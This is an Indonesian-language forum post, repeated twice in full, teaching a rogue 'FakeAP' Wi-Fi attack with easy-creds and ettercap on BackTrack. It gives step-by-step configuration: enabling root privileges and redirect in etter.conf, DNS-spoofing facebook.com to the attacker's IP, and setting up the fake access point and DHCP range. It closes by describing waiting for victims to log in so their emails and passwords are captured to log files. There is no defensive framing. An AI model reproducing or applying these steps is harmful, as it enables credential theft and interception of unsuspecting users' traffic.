04-01-2013, 05:56 PM
permisi umz umz, mas admin dan rekan-rekan sekalian.
saya cuma mau berbagi tutor tentang FakeAp..
maaf sebelumnya, jika salah kamar mohon di pindahkan, jika banyak salah mohon di benarkan, jika kurang jelas mohon di maklumi..
oke langsung saja..
entah bear apa salah judulnya.. yg penting seer aja lah ...
langsung saja..
1. masuk ke menu naga > Backtrack > Privilege Escalation > Protocol Analysis > Network Sniffers > easy-creds .. kaya gambar di bawah :
2. pilih nomor 1 untuk configurasi
> pilih etter.conf
~ cari tulisan "[privs]" dan edit nilai ec_uid dan ec_gid ke NOL (0)
~ masih di etter.conf , geser kebawah dan cari tulisan " # if you use ipchains: " , hilangkan tanda "#" pada redir_comand_on" dan redir_comand_of" yang berada di bawah tulisan " # if you use ipchains: " ..... terus save
> pilih etter.dns
~ cari tulisan yang berbau microsoft.com ganti dengan facebook.com ( terserah anda) dan ganti IP di belakang huruf "A" dengan IP kita... save
> pilih no. 5 " edit tunneling"
~ masukan INTERFACES="at0" pada baris terakhir.. save
3. setelah konfigurasi selesai kembali kemenu utama, dan pilih nomor 3 ( FakeAP Attacks )
4. pilih nomor 1 FakeAp Attack Static
5. provide path for saving log files, ex. root, *NOT* /root/ : <--- isi direktori untuk menyimpan file log, kalo saya ketik aja "/root" enter
6. would you like to include a sidejacking attacj? (y/n) : <-- pilih aja no "n"
7. interfaces connected to the internet, example eth0: <-- interface yang terkoneksi dengan internet, karena saya menggunakan modem jadi saya pilih ppp0.. enter
8. wirelles interfaces name, example wlan0 : <-- interface wireless kita , ketik aja wlan0 atau sesuai dengan wireless inface yang anda gunakan.
9.ESSID you would like your rogue AP to be called, example freewifi : <--ketikan nama ssid yang di inginkan .. enter
10. channel you would like to broadcast on : 6 <-- broadcast pada channel 6
11. enter your monitor enable interface name, example mon0: mon0
12. enter your tunnel interfaces, example at0 : at0 <-- isi sesuai dengan yang telah kita masukan di inface tunelling.
13. do you have a populated dhcp.conf file to use ? (y/n) : n
14. network range for your tunneled interfaces, example 10.0.0.0/24: 192.168.0.0/24 <-- satu range dengan ip yang di masukan di etter.dns.. enter
15.enter the ip address for dns server, example 8.8.8.8 : 8.8.8.8
tunggu sampai prosees pembuatan FakeAP selesai, jika muncul menu utama lagi, itu menandakan pembuatan FakeAp sudah selesai.
sekarnag tinggal menunggu korban mengkoneksikan ke fakeap kita,, ketika korban sudah terkoneksi dan masuk ke facebook.com dan melakukan login maka email dan password akan langsung tersimpan di log files...
untuk mengakses log files , kita masuk ke folder yang sudah ditentukan pada konfigurasi pertama tadi.
cari folder yang bernama "easy-creds-", cari files "ettercap-.txt" dan bisa dilihat hasil capture dari fakeAp..
kalo kurang jelas bisa langsung menuju blog saya http://maviabae.blogspot.com/2012/11/cap...ccess.html
sekian dulu dari saya.. semoga barokah dan manfaat...
saya cuma mau berbagi tutor tentang FakeAp..
maaf sebelumnya, jika salah kamar mohon di pindahkan, jika banyak salah mohon di benarkan, jika kurang jelas mohon di maklumi..
oke langsung saja..
entah bear apa salah judulnya.. yg penting seer aja lah ...
langsung saja..
1. masuk ke menu naga > Backtrack > Privilege Escalation > Protocol Analysis > Network Sniffers > easy-creds .. kaya gambar di bawah :
2. pilih nomor 1 untuk configurasi
> pilih etter.conf
~ cari tulisan "[privs]" dan edit nilai ec_uid dan ec_gid ke NOL (0)
~ masih di etter.conf , geser kebawah dan cari tulisan " # if you use ipchains: " , hilangkan tanda "#" pada redir_comand_on" dan redir_comand_of" yang berada di bawah tulisan " # if you use ipchains: " ..... terus save
> pilih etter.dns
~ cari tulisan yang berbau microsoft.com ganti dengan facebook.com ( terserah anda) dan ganti IP di belakang huruf "A" dengan IP kita... save
> pilih no. 5 " edit tunneling"
~ masukan INTERFACES="at0" pada baris terakhir.. save
3. setelah konfigurasi selesai kembali kemenu utama, dan pilih nomor 3 ( FakeAP Attacks )
4. pilih nomor 1 FakeAp Attack Static
5. provide path for saving log files, ex. root, *NOT* /root/ : <--- isi direktori untuk menyimpan file log, kalo saya ketik aja "/root" enter
6. would you like to include a sidejacking attacj? (y/n) : <-- pilih aja no "n"
7. interfaces connected to the internet, example eth0: <-- interface yang terkoneksi dengan internet, karena saya menggunakan modem jadi saya pilih ppp0.. enter
8. wirelles interfaces name, example wlan0 : <-- interface wireless kita , ketik aja wlan0 atau sesuai dengan wireless inface yang anda gunakan.
9.ESSID you would like your rogue AP to be called, example freewifi : <--ketikan nama ssid yang di inginkan .. enter
10. channel you would like to broadcast on : 6 <-- broadcast pada channel 6
11. enter your monitor enable interface name, example mon0: mon0
12. enter your tunnel interfaces, example at0 : at0 <-- isi sesuai dengan yang telah kita masukan di inface tunelling.
13. do you have a populated dhcp.conf file to use ? (y/n) : n
14. network range for your tunneled interfaces, example 10.0.0.0/24: 192.168.0.0/24 <-- satu range dengan ip yang di masukan di etter.dns.. enter
15.enter the ip address for dns server, example 8.8.8.8 : 8.8.8.8
tunggu sampai prosees pembuatan FakeAP selesai, jika muncul menu utama lagi, itu menandakan pembuatan FakeAp sudah selesai.
sekarnag tinggal menunggu korban mengkoneksikan ke fakeap kita,, ketika korban sudah terkoneksi dan masuk ke facebook.com dan melakukan login maka email dan password akan langsung tersimpan di log files...
untuk mengakses log files , kita masuk ke folder yang sudah ditentukan pada konfigurasi pertama tadi.
cari folder yang bernama "easy-creds-", cari files "ettercap-.txt" dan bisa dilihat hasil capture dari fakeAp..
kalo kurang jelas bisa langsung menuju blog saya http://maviabae.blogspot.com/2012/11/cap...ccess.html
sekian dulu dari saya.. semoga barokah dan manfaat...